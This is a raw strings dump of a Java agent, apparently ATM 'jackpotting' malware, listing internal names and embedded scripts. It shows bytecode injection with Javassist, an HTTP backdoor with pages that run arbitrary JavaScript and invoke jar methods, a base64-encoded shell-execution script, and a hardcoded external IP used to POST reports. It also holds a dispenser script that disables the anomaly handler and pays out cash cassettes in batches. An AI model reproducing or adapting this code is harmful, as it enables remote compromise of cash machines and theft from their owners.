000000006EC1 0 toString 000000006ECC 000000006ECC 0 (I)Ljava/lang/String; 000000006EE4 000000006EE4 0 contains 000000006EEF 000000006EEF 0 checklog 000000006EFA 000000006EFA 0 getDefault 000000006F07 000000006F07 0 ()Linjx2/javassist/ClassPool; 000000006F2E 000000006F2E 0 Ljava/io/BufferedWriter; 000000006F49 000000006F49 0 append 000000006F51 000000006F51 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 000000006F82 000000006F82 0 write 000000006F8A 000000006F8A 0 (Ljava/lang/String;)V 000000006FA2 000000006FA2 0 flush 000000006FAA 000000006FAA 0 startsWith 000000006FB7 000000006FB7 0 (Ljava/lang/String;)Z 000000006FCF 000000006FCF 0 getClassLoader 000000006FE0 000000006FE0 0 replace 000000006FEA 000000006FEA 0 (CC)Ljava/lang/String; 000000007003 000000007003 0 getResource 000000007010 000000007010 0 "(Ljava/lang/String;)Ljava/net/URL; 000000007035 000000007035 0 D(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String; 00000000707D 00000000707D 0 printStackTrace 00000000708F 00000000708F 0 getLocalizedMessage 0000000070A5 0000000070A5 0 getMessage 0000000070B2 0000000070B2 0 java/util/logging/Logger 0000000070CC 0000000070CC 0 getLogger 0000000070D8 0000000070D8 0 .(Ljava/lang/String;)Ljava/util/logging/Logger; 00000000710A 00000000710A 0 java/util/logging/Level 000000007124 000000007124 0 SEVERE 00000000712D 00000000712D 0 Ljava/util/logging/Level; 00000000714E 00000000714E 0 C(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V 000000007194 000000007194 0 origbytes 0000000071A1 0000000071A1 0 Ljava/util/Hashtable; 0000000071BE 0000000071BE 0 &(Ljava/lang/Object;)Ljava/lang/Object; 0000000071E7 0000000071E7 0 -(Ljava/lang/String;)Linjx2/javassist/CtClass; 000000007218 000000007218 0 stopPruning 00000000722D 00000000722D 0 isFrozen 00000000723E 00000000723E 0 defrost 000000007248 000000007248 0 clone 000000007250 000000007250 0 ()Ljava/lang/Object; 000000007267 000000007267 0 ([B)V 00000000726E 00000000726E 0 makeClass File pos Mem pos ID Text ======== ======= == ==== 00000000727A 00000000727A 0 0(Ljava/io/InputStream;)Linjx2/javassist/CtClass; 0000000072AE 0000000072AE 0 rebuildClassFile 0000000072C1 0000000072C1 0 toBytecode 0000000072D5 0000000072D5 0 getDeclaredMethods 0000000072EA 0000000072EA 0 ()[Linjx2/javassist/CtMethod; 00000000730A 00000000730A 0 getDeclaredConstructors 000000007323 000000007323 0 "()[Linjx2/javassist/CtConstructor; 000000007349 000000007349 0 getDeclaredMethod 00000000735C 00000000735C 0 .(Ljava/lang/String;)Linjx2/javassist/CtMethod; 00000000738E 00000000738E 0 getParameterTypes 0000000073A2 0000000073A2 0 ()[Linjx2/javassist/CtClass; 0000000073C1 0000000073C1 0 split 0000000073C8 0000000073C8 0 '(Ljava/lang/String;)[Ljava/lang/String; 0000000073F3 0000000073F3 0 replaceAll 0000000073FF 0000000073FF 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 00000000743B 00000000743B 0 toUpperCase 000000007449 000000007449 0 getModifiers 000000007458 000000007458 0 injx2/javassist/Modifier 000000007473 000000007473 0 isNative 000000007485 000000007485 0 isAbstract 000000007492 000000007492 0 insertBefore 0000000074A1 0000000074A1 0 insertAfter 0000000074AF 0000000074AF 0 (Ljava/lang/Class;[B)V 0000000074C8 0000000074C8 0 redefineClasses 0000000074D9 0000000074D9 0 *([Ljava/lang/instrument/ClassDefinition;)V 000000007507 000000007507 0 (Ljava/io/Writer;)V 00000000751D 00000000751D 0 (Ljava/io/PrintWriter;)V 00000000753F 00000000753F 0 (Ljava/io/InputStream;)V 00000000755A 00000000755A 0 getProperty 000000007568 000000007568 0 parseInt 000000007573 000000007573 0 (Ljava/lang/String;)I 00000000758B 00000000758B 0 injx2/HTTPServ 0000000075A7 0000000075A7 0 &(Ljava/lang/String;)Ljava/lang/String; 0000000075D7 0000000075D7 0 (Ljava/io/OutputStream;)V 0000000075F3 0000000075F3 0 close 0000000075FB 0000000075FB 0 forName 000000007604 000000007604 0 %(Ljava/lang/String;)Ljava/lang/Class; 00000000762D 00000000762D 0 getDeclaredField 00000000763F 00000000763F 0 -(Ljava/lang/String;)Ljava/lang/reflect/Field; 000000007670 000000007670 0 java/lang/reflect/Field 00000000768A 00000000768A 0 setAccessible 0000000076A6 0000000076A6 0 '(Ljava/lang/Object;Ljava/lang/Object;)V 0000000076D1 0000000076D1 0 isDirectory 0000000076DE 0000000076DE 0 listFiles 0000000076EB 0000000076EB 0 ()[Ljava/io/File; 0000000076FF 0000000076FF 0 getCanonicalPath 000000007712 000000007712 0 appendClassPath 000000007723 000000007723 0 /(Ljava/lang/String;)Linjx2/javassist/ClassPath; 000000007756 000000007756 0 getParentFile 000000007766 000000007766 0 ()Ljava/io/File; 000000007779 000000007779 0 getAbsolutePath 00000000778B 00000000778B 0 (Ljava/lang/String;Z)V 0000000077A4 0000000077A4 0 setErr 0000000077AD 0000000077AD 0 (Ljava/io/PrintStream;)V 0000000077C8 0000000077C8 0 (Ljava/lang/Runnable;)V 0000000077E2 0000000077E2 0 start 0000000077EA 0000000077EA 0 sleep 0000000077F9 0000000077F9 0 getProtectionDomain 00000000780E 00000000780E 0 "()Ljava/security/ProtectionDomain; 000000007834 000000007834 0 java/security/ProtectionDomain File pos Mem pos ID Text ======== ======= == ==== 000000007855 000000007855 0 getCodeSource 000000007865 000000007865 0 ()Ljava/security/CodeSource; 000000007884 000000007884 0 java/security/CodeSource 00000000789F 00000000789F 0 getLocation 0000000078AD 0000000078AD 0 ()Ljava/net/URL; 0000000078C0 0000000078C0 0 toURI 0000000078C8 0000000078C8 0 ()Ljava/net/URI; 0000000078DB 0000000078DB 0 java/net/URI 0000000078EA 0000000078EA 0 getPath 0000000078F3 0000000078F3 0 "appendToBootstrapClassLoaderSearch 000000007919 000000007919 0 (Ljava/util/jar/JarFile;)V 000000007936 000000007936 0 currentThread 000000007946 000000007946 0 ()Ljava/lang/Thread; 00000000795D 00000000795D 0 setContextClassLoader 000000007975 000000007975 0 (Ljava/lang/ClassLoader;)V 000000007991 000000007991 0 loadClass 00000000799D 00000000799D 0 @(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method; 0000000079E1 0000000079E1 0 java/lang/reflect/Method 0000000079FC 0000000079FC 0 invoke 000000007A04 000000007A04 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 000000009BDC 000000009BDC 0 injx2/Global.class 000000009D51 000000009D51 0 Ljava/io/BufferedWriter; 000000009D6C 000000009D6C 0 verbose 000000009D79 000000009D79 0 logoutput 000000009D86 000000009D86 0 Ljava/lang/String; 000000009D9B 000000009D9B 0 instrument 000000009DA7 000000009DA7 0 &Ljava/lang/instrument/Instrumentation; 000000009DD0 000000009DD0 0 origbytes 000000009DDD 000000009DDD 0 Ljava/util/Hashtable; 000000009DF4 000000009DF4 0 Signature 000000009E00 000000009E00 0 +Ljava/util/Hashtable<Ljava/lang/String;[B>; 000000009E2F 000000009E2F 0 alreadyinjected 000000009E40 000000009E40 0 ;Ljava/util/Hashtable<Ljava/lang/String;Ljava/lang/String;>; 000000009E85 000000009E85 0 Ljava/util/Map; 000000009E96 000000009E96 0 5Ljava/util/Map<Ljava/lang/Object;Ljava/lang/Object;>; 000000009ECF 000000009ECF 0 stack 000000009ED7 000000009ED7 0 classmap 000000009EE2 000000009EE2 0 runningclass 000000009EF1 000000009EF1 0 <init> 000000009F07 000000009F07 0 LineNumberTable 000000009F19 000000009F19 0 LocalVariableTable 000000009F35 000000009F35 0 Linjx2/Global; 000000009F46 000000009F46 0 scandyna 000000009F5B 000000009F5B 0 tsize 000000009F6D 000000009F6D 0 Ljava/util/zip/ZipEntry; 000000009F95 000000009F95 0 Ljava/net/URL; 000000009FAB 000000009FAB 0 Ljava/io/IOException; 000000009FC9 000000009FC9 0 Ljava/util/zip/ZipInputStream; 000000009FF0 000000009FF0 0 Ljava/security/CodeSource; 00000000A00D 00000000A00D 0 StackMapTable 00000000A032 00000000A032 0 callback 00000000A03C 00000000A03C 0 K(Ljava/lang/String;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object; 00000000A08B 00000000A08B 0 ptype 00000000A093 00000000A093 0 [Ljava/lang/Class; 00000000A0A8 00000000A0A8 0 mname 00000000A0B9 00000000A0B9 0 Ljava/lang/Class; 00000000A0D1 00000000A0D1 0 Ljava/lang/Object; 00000000A0ED 00000000A0ED 0 [Ljava/lang/reflect/Method; 00000000A10B 00000000A10B 0 Ljava/lang/Exception; 00000000A123 00000000A123 0 classs File pos Mem pos ID Text ======== ======= == ==== 00000000A12C 00000000A12C 0 method 00000000A13C 00000000A13C 0 [Ljava/lang/Object; 00000000A157 00000000A157 0 Linjx2/ViewClassLoader; 00000000A171 00000000A171 0 LocalVariableTypeTable 00000000A18A 00000000A18A 0 [Ljava/lang/Class<*>; 00000000A1B6 00000000A1B6 0 insertjar 00000000A1C3 00000000A1C3 0 ([B)V 00000000A1CB 00000000A1CB 0 cname 00000000A1D3 00000000A1D3 0 stream 00000000A1DC 00000000A1DC 0 entry 00000000A1E4 00000000A1E4 0 jfile 00000000A1EC 00000000A1EC 0 checklog 00000000A203 00000000A203 0 Ljava/io/File; 00000000A217 00000000A217 0 <clinit> 00000000A222 00000000A222 0 SourceFile 00000000A22F 00000000A22F 0 Global.java 00000000A242 00000000A242 0 injx2/Global 00000000A269 00000000A269 0 java/util/zip/ZipInputStream 00000000A2A2 00000000A2A2 0 dynamic/ 00000000A2DD 00000000A2DD 0 java/io/IOException 00000000A308 00000000A308 0 injx2/ViewClassLoader 00000000A33C 00000000A33C 0 java/lang/Object 00000000A354 00000000A354 0 java/lang/Exception 00000000A36A 00000000A36A 0 java/io/ByteArrayInputStream 00000000A38E 00000000A38E 0 .class 00000000A3BD 00000000A3BD 0 java/io/File 00000000A3CC 00000000A3CC 0 /dev/shm 00000000A3E1 00000000A3E1 0 java/lang/StringBuilder 00000000A400 00000000A400 0 /.loginside 00000000A413 00000000A413 0 os.name 00000000A432 00000000A432 0 APPDATA 00000000A441 00000000A441 0 \logft.log 00000000A44E 00000000A44E 0 stdout 00000000A457 00000000A457 0 java/io/BufferedWriter 00000000A470 00000000A470 0 java/io/OutputStreamWriter 00000000A49C 00000000A49C 0 java/io/FileWriter 00000000A4B6 00000000A4B6 0 java/util/HashMap 00000000A4E1 00000000A4E1 0 java/security/CodeSource 00000000A4FC 00000000A4FC 0 java/net/URL 00000000A50B 00000000A50B 0 java/util/zip/ZipEntry 00000000A524 00000000A524 0 java/lang/Throwable 00000000A53A 00000000A53A 0 java/lang/String 00000000A54D 00000000A54D 0 java/lang/Class 00000000A55F 00000000A55F 0 getProtectionDomain 00000000A574 00000000A574 0 "()Ljava/security/ProtectionDomain; 00000000A59A 00000000A59A 0 java/security/ProtectionDomain 00000000A5BB 00000000A5BB 0 getCodeSource 00000000A5CB 00000000A5CB 0 ()Ljava/security/CodeSource; 00000000A5EA 00000000A5EA 0 getLocation 00000000A5F8 00000000A5F8 0 ()Ljava/net/URL; 00000000A60B 00000000A60B 0 openStream 00000000A618 00000000A618 0 ()Ljava/io/InputStream; 00000000A632 00000000A632 0 (Ljava/io/InputStream;)V 00000000A64D 00000000A64D 0 getNextEntry 00000000A65C 00000000A65C 0 ()Ljava/util/zip/ZipEntry; 00000000A679 00000000A679 0 getName 00000000A683 00000000A683 0 ()Ljava/lang/String; 00000000A69A 00000000A69A 0 startsWith 00000000A6A7 00000000A6A7 0 (Ljava/lang/String;)Z 00000000A6BF 00000000A6BF 0 endsWith File pos Mem pos ID Text ======== ======= == ==== 00000000A6CA 00000000A6CA 0 getSize 00000000A6E1 00000000A6E1 0 ([B)I 00000000A6E9 00000000A6E9 0 java/lang/System 00000000A6FB 00000000A6FB 0 arraycopy 00000000A707 00000000A707 0 *(Ljava/lang/Object;ILjava/lang/Object;II)V 00000000A735 00000000A735 0 close 00000000A73D 00000000A73D 0 java/util/logging/Logger 00000000A757 00000000A757 0 getLogger 00000000A763 00000000A763 0 .(Ljava/lang/String;)Ljava/util/logging/Logger; 00000000A795 00000000A795 0 java/util/logging/Level 00000000A7AF 00000000A7AF 0 SEVERE 00000000A7B8 00000000A7B8 0 Ljava/util/logging/Level; 00000000A7D9 00000000A7D9 0 C(Ljava/util/logging/Level;Ljava/lang/String;Ljava/lang/Throwable;)V 00000000A81F 00000000A81F 0 loadClass 00000000A82B 00000000A82B 0 %(Ljava/lang/String;)Ljava/lang/Class; 00000000A854 00000000A854 0 newInstance 00000000A862 00000000A862 0 ()Ljava/lang/Object; 00000000A879 00000000A879 0 getMethods 00000000A886 00000000A886 0 ()[Ljava/lang/reflect/Method; 00000000A8A6 00000000A8A6 0 java/lang/reflect/Method 00000000A8C1 00000000A8C1 0 equals 00000000A8CA 00000000A8CA 0 (Ljava/lang/Object;)Z 00000000A8E2 00000000A8E2 0 getParameterTypes 00000000A8F6 00000000A8F6 0 ()[Ljava/lang/Class; 00000000A90D 00000000A90D 0 invoke 00000000A915 00000000A915 0 9(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 00000000A952 00000000A952 0 java/util/Map 00000000A967 00000000A967 0 8(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; 00000000A9A3 00000000A9A3 0 printStackTrace 00000000A9B5 00000000A9B5 0 (Ljava/lang/String;)V 00000000A9CD 00000000A9CD 0 isDirectory 00000000A9E1 00000000A9E1 0 append 00000000A9E9 00000000A9E9 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 00000000AA1A 00000000AA1A 0 toString 00000000AA25 00000000AA25 0 getProperty 00000000AA32 00000000AA32 0 &(Ljava/lang/String;)Ljava/lang/String; 00000000AA5C 00000000AA5C 0 toLowerCase 00000000AA6A 00000000AA6A 0 indexOf 00000000AA74 00000000AA74 0 (Ljava/lang/String;)I 00000000AA8C 00000000AA8C 0 getenv 00000000AA9B 00000000AA9B 0 Ljava/io/PrintStream; 00000000AAB3 00000000AAB3 0 (Ljava/io/OutputStream;)V 00000000AACF 00000000AACF 0 (Ljava/io/Writer;)V 00000000AAE5 00000000AAE5 0 java/util/Collections 00000000AAFD 00000000AAFD 0 synchronizedMap 00000000AB0E 00000000AB0E 0 (Ljava/util/Map;)Ljava/util/Map; 00000000B357 00000000B357 0 injx2/HTTPServ$MyHandler$dispen.class 00000000B44E 00000000B44E 0 Ljava/lang/String; 00000000B468 00000000B468 0 this$0 00000000B473 00000000B473 0 MyHandler 00000000B480 00000000B480 0 InnerClasses 00000000B48F 00000000B48F 0 Linjx2/HTTPServ$MyHandler; 00000000B4AC 00000000B4AC 0 <init> 00000000B4B4 00000000B4B4 0 A(Linjx2/HTTPServ$MyHandler;Ljava/lang/String;Ljava/lang/String;)V 00000000B500 00000000B500 0 LineNumberTable 00000000B512 00000000B512 0 LocalVariableTable 00000000B52E 00000000B52E 0 dispen 00000000B536 00000000B536 0 !Linjx2/HTTPServ$MyHandler$dispen; 00000000B56C 00000000B56C 0 result 00000000B575 00000000B575 0 rawData File pos Mem pos ID Text ======== ======= == ==== 00000000B58A 00000000B58A 0 Ljava/net/URL; 00000000B5A2 00000000B5A2 0 Ljava/net/HttpURLConnection; 00000000B5C6 00000000B5C6 0 Ljava/io/OutputStream; 00000000B5E5 00000000B5E5 0 Ljava/lang/Exception; 00000000B602 00000000B602 0 StackMapTable 00000000B61B 00000000B61B 0 SourceFile 00000000B628 00000000B628 0 HTTPServ.java 00000000B651 00000000B651 0 %%list_dispense%% 00000000B67A 00000000B67A 0 java/lang/StringBuilder 00000000B6CE 00000000B6CE 0 !application/x-www-form-urlencoded 00000000B6F3 00000000B6F3 0 java/net/URL 00000000B711 00000000B711 0 java/net/HttpURLConnection 00000000B73F 00000000B73F 0 Content-Type 00000000B753 00000000B753 0 Content-Length 00000000B785 00000000B785 0 java/lang/Exception 00000000B79B 00000000B79B 0 ERRSRV 00000000B7A5 00000000B7A5 0 injx2/HTTPServ$MyHandler$dispen 00000000B7C7 00000000B7C7 0 java/lang/Thread 00000000B7DD 00000000B7DD 0 injx2/HTTPServ$MyHandler 00000000B7FE 00000000B7FE 0 java/lang/String 00000000B811 00000000B811 0 replaceAll 00000000B81D 00000000B81D 0 8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String; 00000000B859 00000000B859 0 runjs 00000000B860 00000000B860 0 &(Ljava/lang/String;)Ljava/lang/String; 00000000B88A 00000000B88A 0 injx2/Global 00000000B8A0 00000000B8A0 0 Ljava/io/BufferedWriter; 00000000B8BB 00000000B8BB 0 append 00000000B8C3 00000000B8C3 0 -(Ljava/lang/String;)Ljava/lang/StringBuilder; 00000000B8F4 00000000B8F4 0 toString 00000000B8FF 00000000B8FF 0 ()Ljava/lang/String; 00000000B916 00000000B916 0 java/io/BufferedWriter 00000000B92F 00000000B92F 0 write 00000000B937 00000000B937 0 (Ljava/lang/String;)V 00000000B94F 00000000B94F 0 flush 00000000B957 00000000B957 0 getBytes 00000000B968 00000000B968 0 javax/xml/bind/DatatypeConverter 00000000B98C 00000000B98C 0 printBase64Binary 00000000B9A0 00000000B9A0 0 ([B)Ljava/lang/String; 00000000B9B9 00000000B9B9 0 java/net/URLEncoder 00000000B9CF 00000000B9CF 0 encode 00000000B9D7 00000000B9D7 0 urlreport 00000000B9E4 00000000B9E4 0 openConnection 00000000B9F5 00000000B9F5 0 ()Ljava/net/URLConnection; 00000000BA12 00000000BA12 0 setDoOutput 00000000BA27 00000000BA27 0 setRequestMethod 00000000BA3A 00000000BA3A 0 setRequestProperty 00000000BA4E 00000000BA4E 0 '(Ljava/lang/String;Ljava/lang/String;)V 00000000BA79 00000000BA79 0 length 00000000BA88 00000000BA88 0 valueOf 00000000BA92 00000000BA92 0 (I)Ljava/lang/String; 00000000BAAA 00000000BAAA 0 connect 00000000BAB4 00000000BAB4 0 getOutputStream 00000000BAC6 00000000BAC6 0 ()Ljava/io/OutputStream; 00000000BAE1 00000000BAE1 0 java/io/OutputStream 00000000BAF8 00000000BAF8 0 ([B)V 00000000BB00 00000000BB00 0 getInputStream 00000000BB11 00000000BB11 0 ()Ljava/io/InputStream; 00000000BB2B 00000000BB2B 0 injx2/HTTPServ 00000000BDF1 00000000BDF1 0 injx2/HTTPServ$MyHandler.class 00000000C0D6 00000000C0D6 0 MyHandler File pos Mem pos ID Text ======== ======= == ==== 00000000C0E3 00000000C0E3 0 InnerClasses 00000000C0F2 00000000C0F2 0 dispen 00000000C0FA 00000000C0FA 0 urlreport 00000000C107 00000000C107 0 Ljava/lang/String; 00000000C11C 00000000C11C 0 jscmd 00000000C131 00000000C131 0 <init> 00000000C147 00000000C147 0 LineNumberTable 00000000C159 00000000C159 0 LocalVariableTable 00000000C175 00000000C175 0 Linjx2/HTTPServ$MyHandler; 00000000C192 00000000C192 0 runjs 00000000C199 00000000C199 0 &(Ljava/lang/String;)Ljava/lang/String; 00000000C1C7 00000000C1C7 0 Ljavax/script/ScriptException; 00000000C1E8 00000000C1E8 0 script 00000000C1F1 00000000C1F1 0 manager 00000000C1FA 00000000C1FA 0 "Ljavax/script/ScriptEngineManager; 00000000C220 00000000C220 0 engine 00000000C229 00000000C229 0 Ljavax/script/ScriptEngine; 00000000C24C 00000000C24C 0 Ljava/io/StringWriter; 00000000C26A 00000000C26A 0 Ljava/io/PrintWriter; 00000000C289 00000000C289 0 StackMapTable 00000000C2AB 00000000C2AB 0 handle 00000000C2B3 00000000C2B3 0 ((Lcom/sun/net/httpserver/HttpExchange;)V 00000000C2EE 00000000C2EE 0 Ljava/io/InputStream; 00000000C306 00000000C306 0 reader 00000000C30F 00000000C30F 0 Ljava/io/BufferedReader; 00000000C330 00000000C330 0 Ljava/lang/StringBuilder; 00000000C35E 00000000C35E 0 Ljava/util/regex/Pattern; 00000000C37E 00000000C37E 0 Ljava/util/regex/Matcher; 00000000C3B1 00000000C3B1 0 [Ljava/lang/Class; 00000000C3D6 00000000C3D6 0 [Ljava/lang/reflect/Method; 00000000C3F8 00000000C3F8 0 Ljava/lang/Class; 00000000C411 00000000C411 0 [Ljava/lang/String; 00000000C427 00000000C427 0 lstatus 00000000C43B 00000000C43B 0 Ljava/lang/Object; 00000000C455 00000000C455 0 Ljava/lang/Exception; 00000000C473 00000000C473 0 [Ljava/lang/Object; 00000000C489 00000000C489 0 match 00000000C498 00000000C498 0 param 00000000C4A0 00000000C4A0 0 entry 00000000C4AD 00000000C4AD 0 Ljava/util/Iterator; 00000000C4C4 00000000C4C4 0 jfile 00000000C4D1 00000000C4D1 0 ptype 00000000C4D9 00000000C4D9 0 mname 00000000C4FA 00000000C4FA 0 Linjx2/ViewClassLoader; 00000000C522 00000000C522 0 function 00000000C52D 00000000C52D 0 xjscmd 00000000C54B 00000000C54B 0 %Lcom/sun/net/httpserver/HttpExchange; 00000000C574 00000000C574 0 response 00000000C57F 00000000C57F 0 method 00000000C588 00000000C588 0 out_cmd 00000000C597 00000000C597 0 Ljava/io/OutputStream; 00000000C5B0 00000000C5B0 0 LocalVariableTypeTable 00000000C5C9 00000000C5C9 0 [Ljava/lang/Class<*>; 00000000C611 00000000C611 0 Exceptions 00000000C621 00000000C621 0 <clinit> 00000000C62C 00000000C62C 0 SourceFile 00000000C639 00000000C639 0 HTTPServ.java 00000000C64D 00000000C64D 0 javax/script/ScriptEngineManager 00000000C671 00000000C671 0 injx2/HTTPServ 00000000C696 00000000C696 0 java/io/StringWriter File pos Mem pos ID Text ======== ======= == ==== 00000000C6AD 00000000C6AD 0 java/io/PrintWriter 00000000C6E2 00000000C6E2 0 javax/script/ScriptException 00000000C720 00000000C720 0 java/lang/StringBuilder 00000000C765 00000000C765 0 java/io/BufferedReader 00000000C77E 00000000C77E 0 java/io/InputStreamReader 00000000C7CF 00000000C7CF 0 &]+)=([ 00000000C80C 00000000C80C 0 Got query 00000000C823 00000000C823 0 Dispensing 00000000C831 00000000C831 0 injx2/HTTPServ$MyHandler$dispen 00000000C88A 00000000C88A 0 I<form action="/eva" method="POST"><textarea rows="15" cols="40" name="j"> 00000000C8D7 00000000C8D7 0 </textarea><br /><input type="submit" value="Run"></form><textarea rows="15" cols="40" readonly> 00000000C93A 00000000C93A 0 </textarea> 00000000C96A 00000000C96A 0 java/lang/Class 00000000C988 00000000C988 0 </h1><br /> 00000000C9A8 00000000C9A8 0 <a href="/mgr? 00000000C9D5 00000000C9D5 0 )</a><br /> 00000000C9E9 00000000C9E9 0 java/lang/String 00000000CA0A 00000000CA0A 0 !<form method="post" action="/mgr? 00000000CA2E 00000000CA2E 0 "><table> 00000000CA3B 00000000CA3B 0 <tr><td><b> 00000000CA48 00000000CA48 0 6</b></td><td><input type="text" name="ps" /></td></tr> 00000000CA81 00000000CA81 0 ;</table><br /><input type="submit" value="Invoke" /></form> 00000000CAC0 00000000CAC0 0 java/lang/Object 00000000CAEA 00000000CAEA 0 <b>Preparing...</b><br /> 00000000CB0B 00000000CB0B 0 <b>Unprotecting...</b><br /> 00000000CB2F 00000000CB2F 0 <b>Invoking...</b><br /> 00000000CB4F 00000000CB4F 0 <b>Return: </b> 00000000CB61 00000000CB61 0 java/lang/Exception 00000000CB77 00000000CB77 0 <h1>Entries: </h1><br /> 00000000CBAC 00000000CBAC 0 </a><br /> 00000000CBB9 00000000CBB9 0 /core 00000000CBDE 00000000CBDE 0 injx2/ViewClassLoader 00000000CC05 00000000CC05 0 <form action="/core" method="post"><table><tr><td> 00000000CC38 00000000CC38 0 <b>Jar: </b></td><td><input type="text" name="0"></td></tr> 00000000CC74 00000000CC74 0 <tr><td><b>Class: </b></td><td><input type="text" name="1"></td></tr><tr><td><b>Method: </b></td><td><input type="text" name="2"></td></tr><tr><td><b>Args: </b></td><td><input type="text" name="3"></td></tr><tr><td><input type="radio" name="4" vale="a"><b> Autostart</b></td><td><input type="radio" name="4" vale="h" checked><b> Handler</b></td></tr><tr><td></td><td><input type="submit" value="Go"></td></tr></table> 00000000CE16 00000000CE16 0 </form> 00000000CE20 00000000CE20 0 This is POST 00000000CE5B 00000000CE5B 0 os.name 00000000CE7D 00000000CE7D 0 cKJd.exe 00000000CE91 00000000CE91 0 %%shell%% 00000000CE9E 00000000CE9E 0 %%arg%% 00000000CEA8 00000000CEA8 0 %%cmdb64%% 00000000CEBF 00000000CEBF 0 Content-Type 00000000CECD 00000000CECD 0 text/html 00000000CEFE 00000000CEFE 0 http://150.100.246.18:60000 00000000CF21 00000000CF21 0 dmFyIEJ1ZmZlcmVkUmVhZGVyPVBhY2thZ2VzLmphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyIik7CnZhciBSZWFkZXI9UGFja2FnZXMuamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImphdmEuaW8uUmVhZGVyIik7CnZhciBJbnB1dFN0cmVhbT1QYWNrYWdlcy5qYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5pby5JbnB1dFN0cmVhbSIpOwp2YXIgcD1QYWNrYWdlcy5qYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhbIiUlc2hlbGwlJSIsIiUlYXJnJSUiLGphdmEubGFuZy5TdHJpbmcoUGFja2FnZXMuamF2YXgueG1sLmJpbmQuRGF0YXR5cGVDb252ZXJ0ZXIucGFyc2VCYXNlNjRCaW5hcnkoIiUlY21kYjY0JSUiKSldKTsKdmFyIGJ1Zj1qYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIocC5nZXRJbnB1dFN0cmVhbSgpKSk7CndoaWxlKDEpewoJdmFyIGxpbmU9YnVmLnJlYWRMaW5lKCk7CglpZihsaW5lIT1udWxsKXsKCQlwcmludChsaW5lKyJcbiIpOwoJfSBlbHNlIHsKCQlicmVhazsKCX0KfQoKCg== 00000000D214 00000000D214 0 var tGlobal=Packages.java.lang.Class.forName("injx2.Global"); 00000000D252 00000000D252 0 var Global=tGlobal.cast(tGlobal.newInstance()); 00000000D282 00000000D282 0 var tPeripheral=Global.runningclass.get("Peripheral"); 00000000D2B9 00000000D2B9 0 var Peripheral=tPeripheral.cast(tPeripheral.newInstance()); 00000000D2F5 00000000D2F5 0 var jsd=Peripheral.Dispenser;if(!jsd.isOk()){print("DERROR");} else {var resume=""; 00000000D349 00000000D349 0 for (var j = 0; j < jsd.getNumberOfCashUnits(); j++) { 00000000D380 00000000D380 0 resume+=jsd.getCashUnit(j).getValue()+":"+jsd.getCashUnit(j).getActual()+";"; 00000000D3D1 00000000D3D1 0 print(resume+"\n");} 00000000D3E8 00000000D3E8 0 var tGlobal=Packages.java.lang.Class.forName("injx2.Global"); 00000000D426 00000000D426 0 var Global=tGlobal.cast(tGlobal.newInstance()); 00000000D456 00000000D456 0 var tPeripheral=Global.runningclass.get("Peripheral"); 00000000D48D 00000000D48D 0 var Peripheral=tPeripheral.cast(tPeripheral.newInstance()); 00000000D4C9 00000000D4C9 0 var jsd=Peripheral.Dispenser; 00000000D4E7 00000000D4E7 0 jsd.clearDispenseValues(); File pos Mem pos ID Text ======== ======= == ==== 00000000D502 00000000D502 0 jsd.removeAnomalyHandler("Dispenser"); 00000000D529 00000000D529 0 var todispen=[%%list_dispense%%]; 00000000D54B 00000000D54B 0 var cassette=[]; 00000000D55C 00000000D55C 0 var resume=""; 00000000D56B 00000000D56B 0 for (var j = 0; j < jsd.getNumberOfCashUnits(); j++) { 00000000D5A2 00000000D5A2 0 resume+=jsd.getCashUnit(j).getValue()+":"+jsd.getCashUnit(j).getActual()+";"; 00000000D5F1 00000000D5F1 0 if(parseInt(jsd.getCashUnit(j).getValue())<=0 || j>=todispen.length){ 00000000D638 00000000D638 0 continue; 00000000D647 00000000D647 0 if(todispen[j]>=jsd.getCashUnit(j).getActual()-100){ 00000000D67D 00000000D67D 0 todispen[j]=jsd.getCashUnit(j).getActual()-100; 00000000D6B2 00000000D6B2 0 cassette.push({denom: jsd.getCashUnit(j).getValue(), id: j}); 00000000D6F3 00000000D6F3 0 print(resume+"\n"); 00000000D707 00000000D707 0 cassette=cassette.sort(function(a, b){return a.denom - b.denom}); 00000000D749 00000000D749 0 for(var ci=cassette.length-1;ci>=0;ci--){ 00000000D773 00000000D773 0 if(todispen[cassette[ci]['id']]>0){ 00000000D798 00000000D798 0 var roundx=Math.ceil(todispen[cassette[ci]['id']]/40); 00000000D7D1 00000000D7D1 0 for(var k=0; k<roundx;k++){ 00000000D7EF 00000000D7EF 0 jsd.clearDispenseValues(); 00000000D80D 00000000D80D 0 var amount=todispen[cassette[ci]['id']]; 00000000D839 00000000D839 0 if(amount>40){ 00000000D84B 00000000D84B 0 amount=40; 00000000D85F 00000000D85F 0 todispen[cassette[ci]['id']]-=amount; 00000000D888 00000000D888 0 jsd.getCashUnit(ci).setDispense(amount); 00000000D8B4 00000000D8B4 0 print(cassette[ci]['id']+":"+cassette[ci]['denom']+":"+amount+"\n"); 00000000D8FC 00000000D8FC 0 var x = jsd.dispense(); 00000000D917 00000000D917 0 if(!x){ print("ERROR:"+jsd.getCommandStatusString()+"\n");break;} 00000000D95C 00000000D95C 0 var y = jsd.present(); 00000000D976 00000000D976 0 var z = jsd.waitForBillsTaken(30); 00000000D9A5 00000000D9A5 0 jsd.setAnomalyHandler("Dispenser"); 00000000D9D0 00000000D9D0 0 injx2/HTTPServ$MyHandler 00000000D9EA 00000000D9EA 0 "com/sun/net/httpserver/HttpHandler 00000000DA10 00000000DA10 0 javax/script/ScriptEngine 00000000DA2B 00000000DA2B 0 